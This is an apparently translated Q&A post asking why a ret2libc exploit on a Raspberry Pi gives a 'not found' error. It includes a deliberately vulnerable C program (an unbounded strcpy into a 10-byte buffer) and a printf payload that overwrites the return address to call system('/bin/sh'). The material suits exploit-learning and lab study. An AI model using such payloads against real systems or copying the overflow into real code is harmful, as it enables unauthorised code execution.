ARM中的Ret2libc漏洞利用

时间:2018-09-17 18:54:32

标签: raspberry-pi arm stack-overflow exploit

我正在尝试在ARM(Raspberry pi)中利用ret2libc。我收到此错误:

sh: 1: t: not found

有人可以解释此错误的含义吗?我知道它可以成功获得外壳,但是我发送的参数有问题:

./ret2ZP `printf "/bin/sh;#CCC\x3c\xef\xff\xbe\x54\xb1\xe9\xb6"`

这是system函数的地址:x54\xb1\xe9\xb6

这是我正在使用的易受攻击的代码:

#include <stdio .h> 
#include <string .h> 
#include <stdlib .h>

void donuts() {
    puts ( ”Donuts . . . ” ) ;
    exit (0);
}
void vuln(char ∗arg) { 
    char buff [10];
    strcpy(buff, arg);
}
int main(int argc , char ∗∗argv) { 
    vuln(argv [1]);
    return 0 ;
}

0 个答案:

没有答案